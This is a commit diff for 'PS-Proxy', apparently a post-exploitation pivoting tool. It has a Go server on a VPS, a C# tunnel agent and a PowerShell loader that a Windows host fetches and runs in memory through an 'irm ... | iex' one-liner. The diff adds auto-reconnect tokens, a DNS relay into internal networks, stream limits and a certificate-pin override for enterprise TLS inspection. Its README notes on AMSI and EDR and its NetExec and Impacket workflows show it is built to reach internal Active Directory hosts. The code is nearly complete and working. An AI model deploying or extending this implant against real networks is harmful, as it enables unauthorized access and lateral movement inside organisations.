Support inspected certificate pin overrides

This commit is contained in:
Harrison-Wells-Cyber
2026-07-22 15:44:17 -07:00
parent ac6a1914a8
commit 64071f0f3f
9 changed files with 653 additions and 70 deletions
+31 -3
View File
@@ -96,7 +96,10 @@ sudo ./psproxy-server \
--cert /etc/letsencrypt/live/c2.example.com/fullchain.pem \
--key /etc/letsencrypt/live/c2.example.com/privkey.pem \
--route 10.10.10.0/24 \
--redirect
--redirect \
--max-streams 256 \
--dns-listen 127.0.0.1:5353 \
--dns-target 10.10.10.10:53
```
With `--redirect`, PS-Proxy creates an iptables NAT chain for each `--route` and
@@ -140,7 +143,8 @@ ldapsearch -x -H ldap://127.0.0.1:1389 -D 'user@example.local' -W -b 'DC=example
Transparent redirect mode is the recommended test-environment workflow right now.
The fixed-target relay remains useful when you want a single local port mapped to
a single target for debugging.
a single target for debugging. Use `--max-streams` to cap concurrent proxied TCP
connections during high-concurrency tools such as NetExec; the default is 256. When `--dns-listen` and `--dns-target` are set together, the server exposes a UDP DNS listener and forwards raw DNS queries through the enrolled agent to the internal DNS server reachable from the agent host.
## Security notes
@@ -156,6 +160,25 @@ a single target for debugging.
but host telemetry, PowerShell logging, AMSI, EDR, crash dumps, or pagefile
behavior are outside the loader's control.
### TLS inspection / enterprise decryption
If an authorized enterprise TLS inspection device presents a different leaf
certificate to the Windows agent than the certificate loaded by the VPS server,
agent certificate pinning will fail. The safest fix is to exempt the PS-Proxy
server domain from TLS decryption so the agent sees the VPS certificate directly.
For controlled labs where decryption cannot be bypassed, pass the inspected leaf
certificate SHA-256 DER hash explicitly:
```bash
--agent-cert-pin-override <64-char-sha256-hex-pin>
```
Only use this when you control and trust the inspection device. This pins the
agent to the certificate it actually sees, not the certificate file loaded by the
VPS server.
## Current implementation status
Implemented now:
@@ -163,10 +186,14 @@ Implemented now:
- Go TLS listener with mixed HTTP staging and raw agent tunnel handling.
- Leaf certificate pin calculation for generated agent configuration.
- Short-lived one-time staging URLs.
- One-time enrollment token validation for the raw tunnel.
- One-time enrollment token validation for the raw tunnel plus reconnect-token authentication after first enrollment.
- Agent auto-reconnect with exponential backoff for transient tunnel failures.
- Framed multiplexed stream protocol.
- Linux transparent TCP redirect mode for direct local-tool TCP connections to routed target IPs.
- Fixed-target TCP relay mode for protocol validation.
- Bounded concurrent stream handling with per-stream local write queues so one slow local TCP client cannot block the whole multiplexed agent session.
- Optional UDP DNS relay that forwards raw DNS queries through the agent to an internal DNS server.
- JSON `/status` endpoint for agent and stream visibility.
- C# agent stream relay that opens normal outbound `TcpClient` connections from
the Windows host.
- PowerShell loader template that loads a compressed/base64 managed assembly from
@@ -190,5 +217,6 @@ matrix that includes:
- NetExec SMB/LDAP tests;
- Impacket SMB/LDAP/RPC tests;
- reconnect and stale route cleanup tests;
- DNS relay tests against an internal AD DNS server;
- malformed frame and enrollment fuzz tests;
- certificate pin mismatch tests.
+77 -5
View File
@@ -14,38 +14,63 @@ namespace PSProxy.Agent
{
public sealed class Tunnel
{
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7;
private const byte FrameOpen = 1, FrameOpenOK = 2, FrameOpenFail = 3, FrameData = 4, FrameClose = 5, FramePing = 6, FramePong = 7, FrameDNSQuery = 8, FrameDNSReply = 9;
private const int MaxPayload = 1 << 20;
private readonly string server;
private readonly int port;
private readonly string certPin;
private readonly string enrollToken;
private readonly string reconnectToken;
private readonly string dnsTarget;
private readonly ConcurrentDictionary<ulong, StreamCtx> streams = new ConcurrentDictionary<ulong, StreamCtx>();
private readonly object sendLock = new object();
private SslStream tls;
private volatile bool stopping;
public Tunnel(string server, int port, string certPin, string enrollToken)
public Tunnel(string server, int port, string certPin, string enrollToken, string reconnectToken, string dnsTarget)
{
this.server = server;
this.port = port;
this.certPin = NormalizeHex(certPin);
this.enrollToken = enrollToken;
this.reconnectToken = reconnectToken ?? "";
this.dnsTarget = dnsTarget ?? "";
if (this.certPin.Length != 64) throw new ArgumentException("CertPin must be a SHA-256 hex string");
if (String.IsNullOrWhiteSpace(enrollToken)) throw new ArgumentException("EnrollToken is required");
}
public void Run()
{
int delayMs = 1000;
while (!stopping)
{
try
{
RunOnce();
delayMs = 1000;
}
catch (Exception ex)
{
Console.Error.WriteLine("[ps-proxy] tunnel error: {0}", ex.Message);
CloseAllStreams();
if (stopping) break;
Thread.Sleep(delayMs);
delayMs = Math.Min(delayMs * 2, 30000);
}
}
}
private void RunOnce()
{
Console.Error.WriteLine("[ps-proxy] connecting to {0}:{1}", server, port);
using (var tcp = new TcpClient())
{
tcp.NoDelay = true;
tcp.Connect(server, port);
ConnectWithTimeout(tcp, server, port, 15000);
using (tls = new SslStream(tcp.GetStream(), false, ValidateServerCertificate))
{
tls.AuthenticateAsClient(server, null, SslProtocols.Tls12, false);
WriteAscii("PSP1\nENROLL " + enrollToken + "\n");
WriteAscii("PSP1\nENROLL " + enrollToken + " " + reconnectToken + "\n");
Frame hello = ReadFrame();
if (hello.Type != FramePong || Encoding.ASCII.GetString(hello.Payload) != "OK") throw new Exception("server did not accept enrollment");
Console.Error.WriteLine("[ps-proxy] enrolled and ready");
@@ -65,6 +90,7 @@ namespace PSProxy.Agent
case FrameData: HandleData(f.StreamID, f.Payload); break;
case FrameClose: CloseStream(f.StreamID, false); break;
case FramePing: SendFrame(new Frame(f.StreamID, FramePong, new byte[0])); break;
case FrameDNSQuery: StartDnsQuery(f.StreamID, f.Payload); break;
}
}
}
@@ -76,7 +102,7 @@ namespace PSProxy.Agent
string host; int dstPort; SplitTarget(target, out host, out dstPort);
var client = new TcpClient();
client.NoDelay = true;
client.Connect(host, dstPort);
ConnectWithTimeout(client, host, dstPort, 15000);
var ctx = new StreamCtx(sid, client);
if (!streams.TryAdd(sid, ctx)) { client.Close(); throw new Exception("duplicate stream"); }
SendFrame(new Frame(sid, FrameOpenOK, new byte[0]));
@@ -98,6 +124,36 @@ namespace PSProxy.Agent
catch { CloseStream(sid, true); }
}
private void StartDnsQuery(ulong sid, byte[] payload)
{
var t = new Thread(delegate() { HandleDnsQuery(sid, payload); });
t.IsBackground = true;
t.Start();
}
private void HandleDnsQuery(ulong sid, byte[] payload)
{
try
{
if (String.IsNullOrWhiteSpace(dnsTarget)) throw new Exception("DNS target is not configured");
string host; int dstPort; SplitTarget(dnsTarget, out host, out dstPort);
using (var udp = new UdpClient())
{
udp.Client.ReceiveTimeout = 5000;
udp.Connect(host, dstPort);
udp.Send(payload, payload.Length);
IPEndPoint ep = null;
byte[] resp = udp.Receive(ref ep);
SendFrame(new Frame(sid, FrameDNSReply, resp));
}
}
catch (Exception ex)
{
Console.Error.WriteLine("[ps-proxy] DNS query failed: " + ex.Message);
SendFrame(new Frame(sid, FrameDNSReply, new byte[0]));
}
}
private void PumpTargetToServer(StreamCtx ctx)
{
byte[] buf = new byte[32768];
@@ -126,6 +182,11 @@ namespace PSProxy.Agent
}
}
private void CloseAllStreams()
{
foreach (ulong sid in streams.Keys) CloseStream(sid, false);
}
private void SendFrame(Frame f)
{
if (f.Payload == null) f.Payload = new byte[0];
@@ -192,6 +253,17 @@ namespace PSProxy.Agent
if (dstPort < 1 || dstPort > 65535) throw new ArgumentException("invalid port");
}
private static void ConnectWithTimeout(TcpClient client, string host, int dstPort, int timeoutMs)
{
IAsyncResult ar = client.BeginConnect(host, dstPort, null, null);
if (!ar.AsyncWaitHandle.WaitOne(timeoutMs))
{
try { client.Close(); } catch { }
throw new TimeoutException("connect timed out: " + host + ":" + dstPort);
}
client.EndConnect(ar);
}
private static string NormalizeHex(string s) { return (s ?? "").Trim().ToLowerInvariant().Replace(":", "").Replace(" ", ""); }
private static void WriteI32BE(byte[] b, int o, int v) { b[o] = (byte)(v >> 24); b[o + 1] = (byte)(v >> 16); b[o + 2] = (byte)(v >> 8); b[o + 3] = (byte)v; }
private static int ReadI32BE(byte[] b, int o) { return ((int)b[o] << 24) | ((int)b[o + 1] << 16) | ((int)b[o + 2] << 8) | (int)b[o + 3]; }
+7 -3
View File
@@ -4,6 +4,8 @@ param(
[int]$Port = {{.Port}},
[string]$CertPin = "{{.CertPin}}",
[string]$EnrollToken = "{{.EnrollToken}}",
[string]$ReconnectToken = "{{.ReconnectToken}}",
[string]$DNSTarget = "{{.DNSTarget}}",
[switch]$NoAutoStart
)
$ErrorActionPreference = "Stop"
@@ -29,10 +31,12 @@ function Start-PSTunnel {
[Parameter(Mandatory=$true)][string]$Server,
[int]$Port = 443,
[Parameter(Mandatory=$true)][string]$CertPin,
[Parameter(Mandatory=$true)][string]$EnrollToken
[Parameter(Mandatory=$true)][string]$EnrollToken,
[string]$ReconnectToken = "",
[string]$DNSTarget = ""
)
if (-not ("PSProxy.Agent.Tunnel" -as [type])) { Import-PSProxyAgentAssembly }
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken)
$t = New-Object PSProxy.Agent.Tunnel -ArgumentList @($Server, $Port, $CertPin, $EnrollToken, $ReconnectToken, $DNSTarget)
$t.Run()
}
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken }
if (-not $NoAutoStart) { Start-PSTunnel -Server $Server -Port $Port -CertPin $CertPin -EnrollToken $EnrollToken -ReconnectToken $ReconnectToken -DNSTarget $DNSTarget }
+279 -33
View File
@@ -5,11 +5,11 @@ import (
"crypto/sha256"
"crypto/tls"
"encoding/hex"
"encoding/json"
"encoding/pem"
"errors"
"flag"
"fmt"
"html/template"
"io"
"log"
"net"
@@ -22,6 +22,7 @@ import (
"sync"
"sync/atomic"
"syscall"
"text/template"
"time"
"github.com/psproxy/psproxy/internal/protocol"
@@ -33,11 +34,15 @@ func main() {
port := flag.Int("port", 443, "TLS listener port")
cert := flag.String("cert", "", "TLS fullchain PEM; defaults to /etc/letsencrypt/live/<domain>/fullchain.pem")
key := flag.String("key", "", "TLS private key PEM; defaults to /etc/letsencrypt/live/<domain>/privkey.pem")
agentCertPinOverride := flag.String("agent-cert-pin-override", "", "override SHA-256 DER certificate pin embedded in staged agents; use only when an authorized TLS inspection device presents a different leaf cert")
tun := flag.String("tun", "psproxy0", "TUN interface name for the planned netstack data plane")
agentTemplate := flag.String("agent-template", "agent/loader/agent.ps1.tmpl", "PowerShell agent loader template")
agentAssemblyFile := flag.String("agent-assembly-b64-file", "", "file containing compressed/base64 PSProxy.Agent.dll; defaults to release/agent_assembly.b64 when present")
redirect := flag.Bool("redirect", false, "install Linux iptables REDIRECT rules for --route CIDRs and relay original destinations through the agent")
redirectPort := flag.Int("redirect-port", 15080, "local transparent redirect listener port")
maxStreams := flag.Int("max-streams", 256, "maximum concurrent proxied TCP streams")
dnsListen := flag.String("dns-listen", "", "optional UDP DNS listener that forwards queries through the agent, e.g. 127.0.0.1:5353")
dnsTarget := flag.String("dns-target", "", "DNS server reachable by the agent for --dns-listen queries, e.g. 10.10.10.10:53")
tcpListen := flag.String("tcp-listen", "", "developer TCP relay listener, e.g. 127.0.0.1:1389")
tcpTarget := flag.String("tcp-target", "", "developer TCP relay target opened by the agent, e.g. 10.10.10.219:389")
routes := multiFlag{}
@@ -57,13 +62,26 @@ func main() {
if (*tcpListen == "") != (*tcpTarget == "") {
log.Fatal("--tcp-listen and --tcp-target must be supplied together")
}
if (*dnsListen == "") != (*dnsTarget == "") {
log.Fatal("--dns-listen and --dns-target must be supplied together")
}
if *redirect && len(routes) == 0 {
log.Fatal("--redirect requires at least one --route CIDR")
}
if err := validateRoutes(routes); err != nil {
log.Fatal(err)
}
pin, err := certPin(*cert)
if err != nil {
log.Fatalf("certificate pin failed: %v", err)
}
if *agentCertPinOverride != "" {
pin, err = normalizeCertPin(*agentCertPinOverride)
if err != nil {
log.Fatalf("invalid --agent-cert-pin-override: %v", err)
}
log.Printf("WARNING: using operator-supplied agent certificate pin override")
}
assembly, err := loadAssemblyB64(*agentAssemblyFile)
if err != nil {
log.Fatalf("agent assembly load failed: %v", err)
@@ -73,14 +91,15 @@ func main() {
}
tmpl := template.Must(template.ParseFiles(*agentTemplate))
store := staging.NewStore(*ttl)
sess, err := store.Create(*domain, *port, pin)
sess, err := store.Create(*domain, *port, pin, *dnsTarget)
if err != nil {
log.Fatal(err)
}
server := NewTunnelServer(store)
server := NewTunnelServer(store, *maxStreams)
mux := http.NewServeMux()
mux.HandleFunc("GET /a/{id}", staging.AgentHandler(store, tmpl, assembly))
mux.HandleFunc("GET /healthz", func(w http.ResponseWriter, r *http.Request) { _, _ = w.Write([]byte("ok\n")) })
mux.HandleFunc("GET /status", statusHandler(server))
var redirectCleanup func()
if *redirect {
redirectCleanup = setupRedirectOrFatal(routes, *redirectPort)
@@ -90,6 +109,9 @@ func main() {
if *tcpListen != "" {
go serveTCPRelay(*tcpListen, *tcpTarget, server)
}
if *dnsListen != "" {
go serveDNSRelay(*dnsListen, server)
}
installSignalCleanup(redirectCleanup)
addr := fmt.Sprintf("%s:%d", *listen, *port)
log.Printf("PS-Proxy Go server starting on https://%s", addr)
@@ -102,18 +124,28 @@ func main() {
if *tcpListen != "" {
log.Printf("Developer TCP relay: %s -> agent -> %s", *tcpListen, *tcpTarget)
}
if *dnsListen != "" {
log.Printf("DNS relay: %s -> agent -> %s", *dnsListen, *dnsTarget)
}
log.Printf("Run this on the Windows host: irm %s/a/%s | iex", publicURL(*domain, *port), sess.ID)
log.Fatal(serveMixedTLS(addr, *cert, *key, mux, server))
}
type TunnelServer struct {
store *staging.Store
mu sync.Mutex
session *AgentSession
nextID atomic.Uint64
store *staging.Store
mu sync.Mutex
session *AgentSession
nextID atomic.Uint64
dnsID atomic.Uint64
maxStreams int
}
func NewTunnelServer(store *staging.Store) *TunnelServer { return &TunnelServer{store: store} }
func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
if maxStreams < 1 {
maxStreams = 1
}
return &TunnelServer{store: store, maxStreams: maxStreams}
}
func (s *TunnelServer) SetSession(a *AgentSession) {
s.mu.Lock()
@@ -127,13 +159,23 @@ func (s *TunnelServer) SetSession(a *AgentSession) {
func (s *TunnelServer) Current() *AgentSession { s.mu.Lock(); defer s.mu.Unlock(); return s.session }
func (s *TunnelServer) ClearSession(a *AgentSession) {
s.mu.Lock()
if s.session == a {
s.session = nil
}
s.mu.Unlock()
}
func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSession, uint64, error) {
a := s.Current()
if a == nil {
return nil, 0, errors.New("no enrolled agent connected")
}
id := s.nextID.Add(1)
a.AttachLocal(id, local)
if err := a.AttachLocal(id, local); err != nil {
return nil, 0, err
}
if err := a.Open(id, target); err != nil {
a.RemoveLocal(id)
return nil, 0, err
@@ -142,21 +184,45 @@ func (s *TunnelServer) OpenAttached(target string, local net.Conn) (*AgentSessio
}
type AgentSession struct {
conn net.Conn
br *bufio.Reader
sendMu sync.Mutex
closeOnce sync.Once
closed chan struct{}
mu sync.Mutex
pending map[uint64]chan error
locals map[uint64]net.Conn
conn net.Conn
br *bufio.Reader
sendMu sync.Mutex
closeOnce sync.Once
closed chan struct{}
mu sync.Mutex
pending map[uint64]chan error
dnsPending map[uint64]chan []byte
locals map[uint64]*localStream
maxStreams int
}
func NewAgentSession(c net.Conn, br *bufio.Reader) *AgentSession {
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, locals: map[uint64]net.Conn{}}
func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
if maxStreams < 1 {
maxStreams = 1
}
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
}
func (a *AgentSession) Close() { a.closeOnce.Do(func() { close(a.closed); _ = a.conn.Close() }) }
func (a *AgentSession) Close() {
a.closeOnce.Do(func() {
close(a.closed)
_ = a.conn.Close()
a.mu.Lock()
for id, ch := range a.pending {
delete(a.pending, id)
ch <- errors.New("agent session closed")
}
for id, ch := range a.dnsPending {
delete(a.dnsPending, id)
close(ch)
}
for id, ls := range a.locals {
delete(a.locals, id)
ls.close()
}
a.mu.Unlock()
})
}
func (a *AgentSession) send(f protocol.Frame) error {
a.sendMu.Lock()
@@ -186,16 +252,29 @@ func (a *AgentSession) Open(id uint64, target string) error {
}
}
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) {
func (a *AgentSession) AttachLocal(id uint64, c net.Conn) error {
a.mu.Lock()
a.locals[id] = c
a.mu.Unlock()
defer a.mu.Unlock()
select {
case <-a.closed:
return errors.New("agent session closed")
default:
}
if len(a.locals) >= a.maxStreams {
return fmt.Errorf("maximum concurrent streams reached: %d", a.maxStreams)
}
a.locals[id] = newLocalStream(c)
return nil
}
func (a *AgentSession) RemoveLocal(id uint64) {
a.mu.Lock()
ls := a.locals[id]
delete(a.locals, id)
a.mu.Unlock()
if ls != nil {
ls.close()
}
}
func (a *AgentSession) Run() {
@@ -225,18 +304,21 @@ func (a *AgentSession) Run() {
}
case protocol.FrameData:
a.mu.Lock()
c := a.locals[f.StreamID]
ls := a.locals[f.StreamID]
a.mu.Unlock()
if c != nil {
_, _ = c.Write(f.Payload)
if ls != nil && !ls.enqueue(f.Payload) {
a.RemoveLocal(f.StreamID)
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameClose})
}
case protocol.FrameClose:
a.RemoveLocal(f.StreamID)
case protocol.FrameDNSReply:
a.mu.Lock()
c := a.locals[f.StreamID]
delete(a.locals, f.StreamID)
ch := a.dnsPending[f.StreamID]
delete(a.dnsPending, f.StreamID)
a.mu.Unlock()
if c != nil {
_ = c.Close()
if ch != nil {
ch <- f.Payload
}
case protocol.FramePing:
_ = a.send(protocol.Frame{StreamID: f.StreamID, Type: protocol.FramePong})
@@ -244,6 +326,140 @@ func (a *AgentSession) Run() {
}
}
type localStream struct {
conn net.Conn
ch chan []byte
done chan struct{}
once sync.Once
}
func newLocalStream(c net.Conn) *localStream {
ls := &localStream{conn: c, ch: make(chan []byte, 32), done: make(chan struct{})}
go ls.writeLoop()
return ls
}
func (l *localStream) enqueue(payload []byte) bool {
buf := append([]byte(nil), payload...)
select {
case l.ch <- buf:
return true
case <-l.done:
return false
default:
return false
}
}
func (l *localStream) writeLoop() {
defer l.close()
for {
select {
case payload := <-l.ch:
if _, err := l.conn.Write(payload); err != nil {
return
}
case <-l.done:
return
}
}
}
func (l *localStream) close() {
l.once.Do(func() {
close(l.done)
_ = l.conn.Close()
})
}
func (s *TunnelServer) Status() map[string]any {
a := s.Current()
status := map[string]any{"agent_connected": a != nil, "max_streams": s.maxStreams}
if a != nil {
a.mu.Lock()
status["active_streams"] = len(a.locals)
status["pending_opens"] = len(a.pending)
status["pending_dns"] = len(a.dnsPending)
a.mu.Unlock()
}
return status
}
func (s *TunnelServer) QueryDNS(query []byte) ([]byte, error) {
a := s.Current()
if a == nil {
return nil, errors.New("no enrolled agent connected")
}
id := s.dnsID.Add(1)
ch := make(chan []byte, 1)
a.mu.Lock()
select {
case <-a.closed:
a.mu.Unlock()
return nil, errors.New("agent session closed")
default:
}
a.dnsPending[id] = ch
a.mu.Unlock()
if err := a.send(protocol.Frame{StreamID: id, Type: protocol.FrameDNSQuery, Payload: query}); err != nil {
a.mu.Lock()
delete(a.dnsPending, id)
a.mu.Unlock()
return nil, err
}
select {
case resp, ok := <-ch:
if !ok {
return nil, errors.New("agent session closed")
}
if len(resp) == 0 {
return nil, errors.New("empty DNS response from agent")
}
return resp, nil
case <-time.After(5 * time.Second):
a.mu.Lock()
delete(a.dnsPending, id)
a.mu.Unlock()
return nil, errors.New("timeout waiting for DNS response")
}
}
func statusHandler(server *TunnelServer) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "application/json")
_ = json.NewEncoder(w).Encode(server.Status())
}
}
func serveDNSRelay(listenAddr string, server *TunnelServer) {
addr, err := net.ResolveUDPAddr("udp", listenAddr)
if err != nil {
log.Fatalf("dns relay resolve failed: %v", err)
}
conn, err := net.ListenUDP("udp", addr)
if err != nil {
log.Fatalf("dns relay listen failed: %v", err)
}
log.Printf("dns relay listening on udp://%s", listenAddr)
buf := make([]byte, 4096)
for {
n, client, err := conn.ReadFromUDP(buf)
if err != nil {
log.Printf("dns relay read failed: %v", err)
continue
}
query := append([]byte(nil), buf[:n]...)
go func() {
resp, err := server.QueryDNS(query)
if err != nil {
log.Printf("dns relay query failed: %v", err)
return
}
_, _ = conn.WriteToUDP(resp, client)
}()
}
}
func serveTransparentRelay(listenAddr string, server *TunnelServer) {
ln, err := net.Listen("tcp4", listenAddr)
if err != nil {
@@ -299,6 +515,15 @@ func originalDst(c net.Conn) (string, error) {
return target, nil
}
func validateRoutes(routes []string) error {
for _, route := range routes {
if _, _, err := net.ParseCIDR(route); err != nil {
return fmt.Errorf("invalid --route CIDR %q: %w", route, err)
}
}
return nil
}
func setupRedirectOrFatal(routes []string, port int) func() {
if os.Geteuid() != 0 {
log.Fatal("--redirect requires root so iptables NAT rules can be installed")
@@ -434,16 +659,27 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
_ = conn.Close()
return
}
if err := server.store.Enroll(strings.TrimSpace(strings.TrimPrefix(line, prefix))); err != nil {
fields := strings.Fields(strings.TrimPrefix(line, prefix))
if len(fields) == 0 {
_ = conn.Close()
return
}
enrollToken := fields[0]
reconnectToken := ""
if len(fields) > 1 {
reconnectToken = fields[1]
}
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
log.Printf("agent enrollment failed: %v", err)
_ = conn.Close()
return
}
a := NewAgentSession(conn, br)
a := NewAgentSession(conn, br, server.maxStreams)
server.SetSession(a)
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
a.Run()
server.ClearSession(a)
}
type singleListener struct {
@@ -454,7 +690,6 @@ type singleListener struct {
func (s *singleListener) Accept() (net.Conn, error) {
if s.conn == nil {
<-s.done
return nil, io.EOF
}
c := s.conn
@@ -481,6 +716,17 @@ type multiFlag []string
func (m *multiFlag) String() string { return strings.Join(*m, ",") }
func (m *multiFlag) Set(v string) error { *m = append(*m, v); return nil }
func normalizeCertPin(pin string) (string, error) {
normalized := strings.ToLower(strings.ReplaceAll(strings.ReplaceAll(strings.TrimSpace(pin), ":", ""), " ", ""))
if len(normalized) != 64 {
return "", fmt.Errorf("pin must be 64 hex characters after removing colons/spaces")
}
if _, err := hex.DecodeString(normalized); err != nil {
return "", fmt.Errorf("pin must be hex: %w", err)
}
return normalized, nil
}
func certPin(path string) (string, error) {
pemBytes, err := os.ReadFile(path)
if err != nil {
+146
View File
@@ -0,0 +1,146 @@
package main
import (
"bufio"
"net"
"testing"
"time"
"github.com/psproxy/psproxy/internal/protocol"
"github.com/psproxy/psproxy/internal/staging"
)
func TestTunnelServerMaxStreams(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 1)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
local1, remote1 := net.Pipe()
defer remote1.Close()
defer local1.Close()
if err := sess.AttachLocal(1, local1); err != nil {
t.Fatalf("first stream should attach: %v", err)
}
local2, remote2 := net.Pipe()
defer remote2.Close()
defer local2.Close()
if err := sess.AttachLocal(2, local2); err == nil {
t.Fatal("second stream should be rejected at max stream limit")
}
}
func TestLocalStreamBackpressureClosesConnection(t *testing.T) {
local, remote := net.Pipe()
defer remote.Close()
ls := newLocalStream(local)
defer ls.close()
failed := false
for i := 0; i < cap(ls.ch)+10; i++ {
if !ls.enqueue([]byte("x")) {
failed = true
break
}
}
if !failed {
t.Fatal("enqueue should eventually fail when the local write queue is full")
}
}
func TestTunnelServerQueryDNS(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
go sess.Run()
go func() {
f, err := protocol.ReadFrame(peer)
if err != nil {
return
}
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply, Payload: []byte("dns-response")})
}()
resp, err := server.QueryDNS([]byte("dns-query"))
if err != nil {
t.Fatalf("dns query failed: %v", err)
}
if string(resp) != "dns-response" {
t.Fatalf("unexpected dns response: %q", resp)
}
}
func TestValidateRoutes(t *testing.T) {
if err := validateRoutes([]string{"10.0.0.0/24", "192.168.1.10/32"}); err != nil {
t.Fatalf("valid routes rejected: %v", err)
}
if err := validateRoutes([]string{"not-a-cidr"}); err == nil {
t.Fatal("invalid CIDR should be rejected")
}
}
func TestTunnelServerQueryDNSEmptyResponseFails(t *testing.T) {
server := NewTunnelServer(staging.NewStore(time.Minute), 2)
agent, peer := net.Pipe()
defer peer.Close()
sess := NewAgentSession(agent, bufio.NewReader(agent), server.maxStreams)
defer sess.Close()
server.SetSession(sess)
go sess.Run()
go func() {
f, err := protocol.ReadFrame(peer)
if err != nil {
return
}
_ = protocol.WriteFrame(peer, protocol.Frame{StreamID: f.StreamID, Type: protocol.FrameDNSReply})
}()
if _, err := server.QueryDNS([]byte("dns-query")); err == nil {
t.Fatal("empty DNS replies should fail")
}
}
func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) {
c1, c2 := net.Pipe()
defer c1.Close()
defer c2.Close()
ln := &singleListener{conn: c1, done: make(chan struct{})}
got, err := ln.Accept()
if err != nil {
t.Fatalf("first accept failed: %v", err)
}
if got != c1 {
t.Fatal("first accept returned unexpected connection")
}
if _, err := ln.Accept(); err == nil {
t.Fatal("second accept should return EOF")
}
}
func TestNormalizeCertPin(t *testing.T) {
pin := "BC:1D:96:47:91:A5:11:B4:95:26:EC:F2:25:35:37:F6:E6:17:0A:1A:19:4F:45:65:9E:88:0C:A7:A4:3D:6C:02"
got, err := normalizeCertPin(pin)
if err != nil {
t.Fatalf("normalize pin failed: %v", err)
}
want := "bc1d964791a511b49526ecf2253537f6e6170a1a194f45659e880ca7a43d6c02"
if got != want {
t.Fatalf("unexpected normalized pin: %s", got)
}
}
func TestNormalizeCertPinRejectsInvalidPins(t *testing.T) {
for _, pin := range []string{"abc", "zz1d964791a511b49526ecf2253537f6e6170a1a194f45659e880ca7a43d6c02"} {
if _, err := normalizeCertPin(pin); err == nil {
t.Fatalf("expected invalid pin %q to fail", pin)
}
}
}
+2
View File
@@ -16,6 +16,8 @@ const (
FrameClose byte = 5
FramePing byte = 6
FramePong byte = 7
FrameDNSQuery byte = 8
FrameDNSReply byte = 9
MaxPayload = 1 << 20
)
+42 -26
View File
@@ -4,32 +4,35 @@ import (
"crypto/rand"
"encoding/base64"
"errors"
"html/template"
"net/http"
"sync"
"text/template"
"time"
)
type Session struct {
ID string
Server string
Port int
CertPin string
EnrollToken string
ExpiresAt time.Time
Delivered bool
Enrolled bool
ID string
Server string
Port int
CertPin string
EnrollToken string
ReconnectToken string
DNSTarget string
ExpiresAt time.Time
Delivered bool
Enrolled bool
}
type Store struct {
mu sync.Mutex
sessions map[string]*Session
tokens map[string]*Session
ttl time.Duration
mu sync.Mutex
sessions map[string]*Session
tokens map[string]*Session
reconnects map[string]*Session
ttl time.Duration
}
func NewStore(ttl time.Duration) *Store {
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, ttl: ttl}
return &Store{sessions: map[string]*Session{}, tokens: map[string]*Session{}, reconnects: map[string]*Session{}, ttl: ttl}
}
func NewSecret(n int) (string, error) {
@@ -40,7 +43,7 @@ func NewSecret(n int) (string, error) {
return base64.RawURLEncoding.EncodeToString(b), nil
}
func (s *Store) Create(server string, port int, certPin string) (*Session, error) {
func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) {
id, err := NewSecret(18)
if err != nil {
return nil, err
@@ -49,11 +52,16 @@ func (s *Store) Create(server string, port int, certPin string) (*Session, error
if err != nil {
return nil, err
}
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ExpiresAt: time.Now().Add(s.ttl)}
reconnect, err := NewSecret(32)
if err != nil {
return nil, err
}
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
s.mu.Lock()
defer s.mu.Unlock()
s.sessions[id] = sess
s.tokens[tok] = sess
s.reconnects[reconnect] = sess
return sess, nil
}
@@ -67,6 +75,7 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
if time.Now().After(sess.ExpiresAt) {
delete(s.sessions, id)
delete(s.tokens, sess.EnrollToken)
delete(s.reconnects, sess.ReconnectToken)
return nil, errors.New("enrollment expired")
}
if sess.Delivered {
@@ -76,19 +85,24 @@ func (s *Store) RedeemScript(id string) (*Session, error) {
return sess, nil
}
func (s *Store) Enroll(token string) error {
func (s *Store) Authenticate(enrollToken, reconnectToken string) error {
s.mu.Lock()
defer s.mu.Unlock()
sess := s.tokens[token]
sess := s.reconnects[reconnectToken]
if sess != nil && sess.Enrolled {
return nil
}
sess = s.tokens[enrollToken]
if sess == nil {
return errors.New("invalid enrollment token")
}
if time.Now().After(sess.ExpiresAt) {
delete(s.sessions, sess.ID)
delete(s.tokens, token)
delete(s.tokens, enrollToken)
delete(s.reconnects, sess.ReconnectToken)
return errors.New("enrollment expired")
}
if sess.Enrolled {
if sess.Enrolled && sess.ReconnectToken != reconnectToken {
return errors.New("enrollment token already used")
}
sess.Enrolled = true
